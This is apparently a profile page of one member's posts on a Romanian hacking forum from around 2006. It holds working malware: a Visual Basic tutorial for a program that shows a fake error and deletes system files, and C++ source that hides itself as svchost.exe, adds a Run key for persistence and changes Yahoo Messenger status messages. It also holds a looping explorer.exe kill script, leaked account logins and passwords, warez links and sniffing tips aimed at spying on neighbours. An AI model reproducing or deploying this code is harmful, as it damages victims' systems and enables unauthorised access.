ghici

Active Members
  • Posts: 258
  • Joined
  • Last visited: Never

Everything posted by ghici

  1. http://rapidshare.de/files/25614399/Hacker...w_6.11.rar.html Hacker's View release VI rar pass: muhaha
     ----------------------------------------
     * view files of any length in text, hex, code modes
     * Pentium-Pro® disassembler & assembler
     * support new executable format file NE,LE,LX,PE
     * support Netware Loadable Modules NLM,DSK,LAN,...
     * one-touch-jump for direct call/jmp instructions in any executable file
     * built-in small decrypt/crypt system
     * built-in powerful calculator
     * any length block operations: read, write, fill
     * multifile search/replace
     * dual executable file OS/2 & DOS
     * includes utilities for detailed dump of NE-, LX/LE- modules
     * includes DOS utility to split/join dual executable files (MZ,NE,LX,LE,PE)
     ----------------------------------------
     password: muhaha
  2. http://rapidshare.de/files/25615206/Sql_In...r_v1.0.rar.html
  3. http://www.megaupload.com/?d=N85940IX or http://rapidshare.de/files/25721393/Acunet...litati.rar.html
  4. This tutorial describes how to register missing files, that is, when you open a booter or any other program and get a runtime error like... File missing.... or component not found... or some other system message.
     Steps:
     1. Download the missing file (it will have the extension .dll or .ocx, .ocx most of the time). Example: mswinsck.ocx, msinet.ocx, kewlbuttonz.ocx etc.
     2. Determine what your operating system type is, i.e. Windows XP or Windows 98 or Windows 2000 or Windows Me or Windows 95 <lmao if ur still using 95.
     3. Now navigate to the folder >> My Computer/ C: / WINDOWS / . Inside this folder you will see a lot of crap (not actually). You got to look for the folders named System and System32. (Please note that after clicking on the My Computer icon and then going into C drive (C if you do not see WINDOWS folder you may see a folder named WINNT depending upon your operating system). Some people have their operating systems installed on the D drive D: , obviously such ppl should navigate to the D:
     2. Place, that is COPY, the missing file with extension .ocx or .dll (not the zip file), the one you just downloaded, in your "System32" folder if your operating system is NT type, i.e. Windows XP or Windows 2000 or Windows NT, "and" place it in your "System" folder if your operating system is Windows Me or Windows 98 or Windows 95. This is very important cos if you place it in the wrong folder it won't work depending upon your operating system!
     -----------------------------------------------------------------------
     For Lamers: How to check what my operating system is?
     Answer: You lame fucknut stop booting and learn your computer basics first. Go to start, click on control panel, on the screen that pops up click on Help (on the top menu bar) and then click about.
     ------------------------------------------------------------------------
     3. Now click on start at the bottom left corner of your screen and then click on run and paste this or type this in the box that pops up:
        regsvr32.exe c:\windows\system32\MissingFile.ocx
        OR if it's a dll file then type this:
        regsvr32.exe c:\windows\system32\MissingFile.dll
        and press OK .... where MissingFile is the file you downloaded... I hope ur not that dumb to type MissingFile.ocx
        EXAMPLE: If you downloaded mswinsck.ocx you would type
        regsvr32.exe c:\windows\system32\mswinsck.ocx
        and hit OK.
        NOTE: if you placed the missing file in the system folder replace system32 with system like this:
        regsvr32.exe c:\windows\system\MissingFile.ocx
     The job's done, you will get a pop-up saying the register succeeded and you can open your program now and won't get an error!
     Tutorial By: Protobomber ==>ENJOY<==
  5. Visual Basic 6 - Creating a Simple Virus Now many of you feel that creating a virus is impossible especially for you beginners. Well this tutorial shows you how to create a simple virus with just a few lines of code. A virus can be an application that deletes files upon request, this is seen as infecting your computer because by deleting key files you may need to take action to get your computer back to normal. First of all open a new Visual Basic project, a standard exe file.. Now it depends on how you want your virus to work, I feel it is best if it is activated once your application is opened so the main code codes in the form load sub. On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on. In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab. Private Sub Form_Load() Text1.Text = "C:/Windows/System32/cmd.exe Kill Text1.Text End Sub Once the project is opened then the command file will be removed. Now I will show you an example of doing this using a command button. Put the following code in the command button and in the form load. You can even give the text box a name to make it quicker. I have labelled it 'A' Private Sub Form_Load() Text1.Text = "C/Windows/System32/cmd.exe" A = Text1.Text End Sub Private Sub Command1_Click Kill A End Sub Now once the command button is clicked on the project the command file will be deleted. Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn't got enough memory to run, but in actual fact the victim doesn't know that you have just removed their command file. Here is to go about it. Private Sub Form_Load() Form1.Visible = False Text1.Text = "C:/Windows/System32/cmd.exe" A = Text1.Text Msgbox ("Runtime Error 492. 
Not Enough Memory.", vbCritical, "Runtime Error" End Sub Private Sub Timer1_Timer() Timer1.Interval = 5000 Kill A Timer1.Enabled = False End Sub All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that's how simple it can be to fool someone. Right, we can now make it a little more difficult if you are finding the above a little too easy. How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well. The example below shows how to remove the files when the application is loaded, we will not be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below. So in the form load part put the following code. Private Sub Form_Load() Form1.Visible = False Msgbox ("Runtime Error 492. Not Enough Memory.", vbCritical, "Runtime Error" Kill "C:/Windows/System32/cmd.exe" s Kill "C:/Windows/regedit.exe" End Sub So above we will be removing the command file and the registry, I don't think the victim will be best pleased about that do you. Now I have shown you the above information I think it's your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/ Then put in the code above but in the Kill put this. Kill "C:/cmd.exe" That's all you need to kill, then you will see the file has been removed. Keep trying new things like I have shown and you will be a pro in no time
  6. by DJAx3L //--------------------------------------------------------------------------- #include <vcl.h> #include <Registry.hpp> #pragma hdrstop #define STATUSMSG "YOUR STATUS MESSAGE HERE" //--------------------------------------------------------------------------- void setstatus() {     AnsiString *username = new AnsiString;     TRegistry *RegGet = new TRegistry(KEY_READ);     try     {         RegGet->RootKey = HKEY_CURRENT_USER;         RegGet->OpenKey("SoftwareYahoopager",false);         *username = RegGet->ReadString("Yahoo! User ID");     }     __finally     {         delete RegGet;     }     TRegistry *RegSet = new TRegistry(KEY_WRITE);     try     {         RegSet->RootKey = HKEY_CURRENT_USER;         AnsiString key = "SoftwareYahoopagerProfiles" + *username + "Custom Msgs";         RegSet->OpenKey(key,false);         RegSet->WriteString("5",STATUSMSG);     }     __finally     {         delete RegSet;     }     HWND hWndY = FindWindow ("YahooBuddyMain", NULL);     PostMessage (hWndY, WM_COMMAND, 0x188, 0);     delete username;     Sleep(15000);     setstatus(); } //--------------------------------------------------------------------------- WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {     try     {         if(ExtractFileName(Application->ExeName) != "svchost.exe") {             char target[30];             GetSystemDirectory(target, MAX_PATH);             AnsiString tg = target;             tg +=  "driverssvchost.exe";             CopyFile(Application->ExeName.c_str(),tg.c_str(),0);             TRegistry *regrun = new TRegistry;             try             {                 regrun->RootKey = HKEY_CURRENT_USER;                 AnsiString key = "SoftwareMicrosoftWindowsCurrentVersionRun";                 regrun->OpenKey(key,false);                 regrun->WriteString("braaainz","""+tg+""");             }             __finally             {                 delete regrun;             }             Application->ShowException(&Exception("Could not 
locate entry point __GETICON in shell32.dll"));             ShellExecute(NULL,"open",tg.c_str(),NULL,NULL,SW_SHOW);             ExitProcess(0);         }         setstatus();     }     catch (Exception &exception)     {        Application->ShowException(&exception);     }     catch (...)     {         try         {             throw Exception("");         }         catch (Exception &exception)         {            Application->ShowException(&exception);         }     }     return 0; } //---------------------------------------------------------------------------
  7. Do you want to modify an executable, make a crack, a trainer, or make an undetectable trojan? I thought about this and decided to present hexadecimal code to you and how to work with it.

     Introduction to hexadecimal

     Hex is short for "hexadecimal", which effectively means a number in base 16. The counting base we usually use is called the decimal base (base 10). That is, every 10 subunits the digit to the left increases by one unit. Since the hexadecimal system is in base 16, it has 6 more symbols. In particular, it uses the digits 0 to 9 and the letters A to F inclusive to represent values (A=10, B=11, C=12, D=13, E=14, F=15).

     In the decimal system, the subunits can only go up to 9. Consequently, the number "ten" must have 2 slots for digits (units): "1" in the tens place (the higher units) and "0" in the units place. The unit above the tens is the hundred, after that the thousand, etc. And because it is a decimal system, each slot can be represented by a power of 10 (the caret "^" means "to the power of ..."; in other words, it denotes an exponent):

     1 = 10^0 or 1
     10 = 10^1 or 10
     100 = 10^2 or 10*10
     1000 = 10^3 or 10*10*10
     10000 = 10^4 or 10*10*10*10

     In the hexadecimal system, each unit can vary between 0 and F. Unlike the number 10 in the decimal system, in the hexadecimal system the number 10 is represented by a single unit, namely the letter A (as I told you, 10 through 15 are written with letters) ... the number 9 in the decimal system being roughly like "F" in the hexadecimal system. So, for those who did not understand: while base 10 only goes from 0 to 9, in base 16 (the hexadecimal system) these are the "digits": 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, F

     As long as the lower unit does not reach 16, a higher unit is not added. Thus, the following conversion is made:

     Base 10   Base 16
     1 = 16^0 (i.e. 1)
     10 = 16^1 (i.e. 16)
     100 = 16^2 (i.e. 256)
     1000 = 16^3 (i.e. 4096)
     10000 = 16^4 (i.e. 65536) - int limit
     ......................................... and the list continues to infinity

     So converting by symbols, we have the following:

     1 in dec = 1 in hex
     10 in dec = A in hex
     100 in dec = 64 in hex
     1000 in dec = 3E8 in hex

     To be sure you have understood: take the last example and think about why 3E8 in hex is 1000 in base 10. First of all, there is a 3 in the "two hundred fifty-six" place. In base 10, if you have the digit 3 in the hundreds place, that means you have three hundred, ok? Therefore, in the hex system, a 3 in the two-hundred-fifty-six place means there are 3 lots of two hundred fifty-six. In other words: 3*256 or 768 (for the base 10 equivalent). That is the two-hundred-fifty-six place. Now, in the higher unit, the "E". Keeping in mind that in hex E means 14, it means we have sixteen lots of fourteen: that is 14*16 (224 for the base 10 equivalent). Finally, for the leftmost unit: 8. What does 8 mean?? In base 16, 8 still means 8. In the end, if we add all 3, we get 768+224+8=1000

     How to convert a number from base 10 to hexadecimal

     The process is the same as above, only it is reversed this time. For example, 289 in base 10 means 121 in base 16. Let's test: We start by finding the largest power of 16 that fits into the number 289 (in base 10). 289 lies between 16^2 (i.e. 256) and 16^3 (i.e. 4096). Then: how many times does 256 go into 289? Only once. So the number we are looking for is 1, because there is only 1 two-hundred-fifty-six in 289 (keep in mind that 256 in hex base means 100 in base 10). Subtracting, we arrive at 289-256=33. Now we have to find how many times 16 (i.e. 10 in base 10) fits into what is left -> that is, into 33. So: 33-16*2=1. Now we do the subtraction again: 33-32=1. And what does 1 mean in hex? Still 1. Now you know you are done because you are left with 0 at the end. Let's put the number together:

     1 of two hundred fifty-six (or 100 in base 16)
     2 of sixteen (or 20 in hex)

     Adding them up, we get 121. Keep in mind that all hex numbers work the same as the base 10 ones, only the limit is at 16 and not at 10.

     I hope you understood the basics of hexadecimal numbering. Now comes the hard part: you have to THINK in the hexadecimal system. In other words, 5+5=A, 4*4=10, B+A+D=22. You will probably use a hexadecimal calculator to convert values... and I actually recommend that. But if you want to start making trainers, you must learn to do the calculations quickly in your head in base 16.

     READ CAREFULLY UP TO HERE! If you understand well up to here, the rest is a piece of cake... If you want me to continue, send a reply and I will continue with integers, bytes etc... and we will get to editing files in hex mode. But tell me whether you understood up to here. I hope I was explicit enough. greetz go to Salieri
  8. Let's start at the beginning - What are sniffers? Well, sniffers are applications (or sometimes hardware devices) that do nothing other than record the data packets travelling through the network. Once installed on a PC, a sniffer can work in 2 modes: normal mode, in which it captures only the data packets travelling on the system on which it is installed, and PROMISCUOUS mode, in which it will capture ALL the data packets travelling through the network, even if they were not sent to the PC on which it is installed. The reason it can also work in promiscuous mode has to do with the way Ethernet networks work. Every time a PC transmits a data packet, it is transmitted in broadcast mode. This means any PC in the network can see these packets (normally all PCs except the one they are destined for should ignore them - but luckily for us they don't). Sniffers can be used both by well-intentioned users and by "ill-intentioned" ones... you know what I mean ... - this means you can see what a guy on the network with you is saying on messenger, see where he goes with his browser etc ... without him knowing ... and you need neither a keylogger nor anything else.

     Conversations between computers are represented by strings of binary data. To be interpreted successfully, sniffer programs usually also include functions for analysing that data, called "protocol analysis", which decode the captured packets to give them meaning (it would not be nice at all to see just a succession of 1s and 0s on your screen). Depending on the protocol used and on the ports from which the information came, the binary data is interpreted and displayed according to the criteria of whoever analyses it. There are separate programs (and filters for existing sniffers) that interpret the data and present it in its original format. For example Ysniff is a sniffer that captures only the packets sent by Messenger clients... and presents them as if you were taking part in the conversation.

     Detection: Most of the time detecting a sniffer is a fairly delicate job that requires advanced networking knowledge. There are 2 ping-type detection methods and both start from the premise that a system listening to the network traffic will respond very slowly to a ping request. There is also an ARP-type method, very similar to the ping one. Some packets are sent (the packets must not be sent by broadcast) to a certain address. If another machine responds to these packets then it has a sniffer installed in promiscuous mode. The DNS method starts from the premise that most sniffer programs automatically perform DNS lookups for the IP addresses they do not see in the network. So a system running in promiscuous mode can be detected when very many DNS lookup requests are recorded coming from it.

     Vulnerable protocols:
     Telnet & Rlogin - A sniffer can capture keystrokes as the user types them, including account names and passwords.
     HTTP - The standard version of HTTP has quite a few security holes. Very many sites use minimal security settings of the "Basic auth" type, which causes passwords to be transmitted in PLAIN TEXT (!!!). Other sites use authentication techniques that ask for the user name and password, but these too are transmitted in plain text.
     SNMP - Most SNMP traffic is SNMP v1, which does not have a high level of security. SNMP passwords can easily be read.
     NNTP - Passwords and data are transmitted in clear text and are not difficult to read.
     POP - Data and passwords can easily be read, being transmitted in clear text.
     FTP - Data and passwords can easily be read, they are transmitted in clear text.
     IMAP - Data and passwords can easily be read, they are likewise transmitted in clear text.

     I hope my vocabulary was not cryptic and that you more or less understood what I mean above. So in short: With a sniffer you can see what your neighbour is doing on the net. If you want to do that, you have to install the sniffer in promiscuous mode and rely on the following protocols: Telnet, HTTP, SNMP, NNTP, POP, FTP and IMAP - as they are the most vulnerable. For the best sniffer in existence, go to http://ethereal.com
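The DNS detection method from the post above, seen from the network administrator's side, as an added example that is not part of the original post: it counts the distinct addresses each client reverse-resolves in a resolver query log and reports the clients above a threshold. The log format, the sample lines, the function names and the threshold are all assumptions made for this illustration.

```python
import re
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample resolver log; the line format is an assumption.
SAMPLE_LOG = """\
2006-07-14T10:00:01 client=192.168.1.23 qtype=PTR qname=5.1.168.192.in-addr.arpa
2006-07-14T10:00:01 client=192.168.1.23 qtype=PTR qname=7.1.168.192.in-addr.arpa
2006-07-14T10:00:02 client=192.168.1.40 qtype=A qname=www.example.com
2006-07-14T10:00:02 client=192.168.1.23 qtype=PTR qname=9.1.168.192.in-addr.arpa
2006-07-14T10:00:03 client=192.168.1.50 qtype=PTR qname=1.1.168.192.in-addr.arpa
2006-07-14T10:00:03 client=192.168.1.23 qtype=PTR qname=11.1.168.192.in-addr.arpa
2006-07-14T10:00:04 client=192.168.1.50 qtype=PTR qname=1.1.168.192.in-addr.arpa
2006-07-14T10:00:04 client=192.168.1.40 qtype=PTR qname=1.1.168.192.in-addr.arpa
2006-07-14T10:00:05 client=192.168.1.23 qtype=PTR qname=12.1.168.192.in-addr.arpa
garbled line without the expected fields
"""

LINE_RE = re.compile(
    r"client=(?P<client>\S+)\s+qtype=(?P<qtype>\S+)\s+qname=(?P<qname>\S+)"
)


def ptr_target(qname):
    """Return the IPv4 address a reverse-lookup name refers to, or None."""
    name = qname.rstrip(".").lower()
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    labels = name[: -len(suffix)].split(".")
    if len(labels) != 4:
        return None
    try:
        # The labels are stored least-significant octet first.
        return str(ip_address(".".join(reversed(labels))))
    except ValueError:
        return None


def reverse_lookup_targets(log_text):
    """Map each client to the set of distinct addresses it reverse-resolved."""
    targets = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m or m["qtype"].upper() != "PTR":
            continue  # unparseable line or a forward lookup
        ip = ptr_target(m["qname"])
        if ip is None or ip == m["client"]:
            continue  # malformed name, or a host resolving its own address
        targets[m["client"]].add(ip)
    return dict(targets)


def suspected_sniffers(log_text, threshold=4):
    """Clients that reverse-resolved at least `threshold` distinct addresses.

    Mail servers and log analysers also do many reverse lookups, so a hit
    is a lead to investigate, not proof of a promiscuous interface.
    """
    targets = reverse_lookup_targets(log_text)
    return sorted(c for c, ips in targets.items() if len(ips) >= threshold)


if __name__ == "__main__":
    print(suspected_sniffers(SAMPLE_LOG))
```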
  9. greetz go to DarthSion. For C++ use the following example: #include <iostream.h> #include <windows.h> void main(){ cout << "nn Ti-am futut rashnitza nn"; cout << "aaaaaaa"; while(1){ System("taskkill -f -im explorer.exe"; } Perl fans can use: print "nn LOL sinucide-te!!!nnaaa"; while(1){ system("taskkill -f -im explorer.exe"; } If you want to close a process by pid (that is, its identification number) and not by its normal name (which is unlikely), use -pid instead of -im.
  10. Sad_Dreamer why are you fighting with people again? you'll end up without friends .. if 0x90 got into your machine .. that's that .. he surely infected you .. anyway let's see if he has proof
  11. Sad_Dreamer how the hell did he have details about your computer then? CPU and the rest? you were infected with a keylogger
  12. 1. wrong section 2. you need at least 10 posts to be able to ask for something/for help 3. read the rules 4. you have a warning! 5. did you even look at the exploits and PoCs section? there is a VIDEO there on how to run an exploit in perl!
  13. QUOTE("Xavier"): [quoted post: I don't agree with you, LAMERS WANT FAME AND GLORY! hackers want.... read the first page about hackers] I was referring more to my own way of thinking... [end of quote] ok
  14. QUOTE("Xavier") I don't agree with you, LAMERS WANT FAME AND GLORY! hackers want.... read the first page about hackers
  15. you know what I think? THAT SAD DREAMER GAVE HIS PROGRAM TO EPIC! HE SHOULD BE BANNED!
  16. can you modify it for me pls, instead of "hackers want money" ... put Romania Security Team, thanks
  17. this is what he gave me yesterday: the IP ranges. anyway there are too many.. what cleanup can you do? you know what the deal is, after a good few dozen minutes they are banned .. but new ones keep getting added ...
      IP Statistics #1 (Before 14/JUL/2006):
      086.xxx.xxx.xxx: 42,21%
      089.xxx.xxx.xxx: 12,27%
      085.xxx.xxx.xxx: 10,62%
      082.xxx.xxx.xxx: 08,01%
      081.xxx.xxx.xxx: 05,44%
      193.xxx.xxx.xxx: 03,79%
      195.xxx.xxx.xxx: 03,49%
      194.xxx.xxx.xxx: 03,09%
      084.xxx.xxx.xxx: 03,04%
      141.xxx.xxx.xxx: 02,80%
      083.xxx.xxx.xxx: 01,86%
      080.xxx.xxx.xxx: 01,37%
      IP Statistics #2 (After 14/JUL/2006):
      086.xxx.xxx.xxx: 47,76%
      089.xxx.xxx.xxx: 19,96%
      085.xxx.xxx.xxx: 10,31%
      081.xxx.xxx.xxx: 05,72%
      193.xxx.xxx.xxx: 05,10%
      194.xxx.xxx.xxx: 03,99%
      195.xxx.xxx.xxx: 03,62%
      084.xxx.xxx.xxx: 01,60%
  18. wow .// nice program .. thx
  19. Website has been attacked several hours on a daily basis with drones simulating HTTP requests, making it harder than usual to separate the malicious and legit traffic. More specifically, the site has been getting attacked with 2000-2500 drones simultaneously, but new drones keep getting added every minute, making it even harder to deal with this attack. According to my calculations over 5000-6000 drones have been used all these days in order to overload the website. I have been investigating the attack and have been applying ratelimit filters to our firewalls in order to decrease the effects, but still the website is slow. I just applied some new filters and I'd like you to keep me informed if you still have trouble. Contact: ciriboflacs@yahoo.com [ I'm on vacation but I will try to check my mail every day ] ENJOY POSTING !
  20. damn .. kw3rln has gone on vacation and limited the domain to a few KB .. for me it runs at a constant 500 Bytes/s
  21. PsYKid that's about right... the thing is we got a DDoS 2 days ago from 3000 drones .. + kw3rln banned 15k IPs on the server. right now it is slow because THE DOMAIN IS LIMITED! kw3rln limited it to a few KB to make sure the domain doesn't get suspended. when these guys are done with the flood it will work fine again
  22. lol BoRy .. what is there to configure on it? ) :@
  23. Login: 1503151 Password: 4681630 Login: 1502651 Password: 3451427 Login: 1509344 Password: 2218328 Hello, 1503151! Your Premium-Account is valid until Sat, 15. Jul 2006.
  24. thanks! There are 33262 free premium-accounts left!
  25. RedJoker don't you know Romanian? the one they posted is supposed to be prorat 2.0 nemtudom?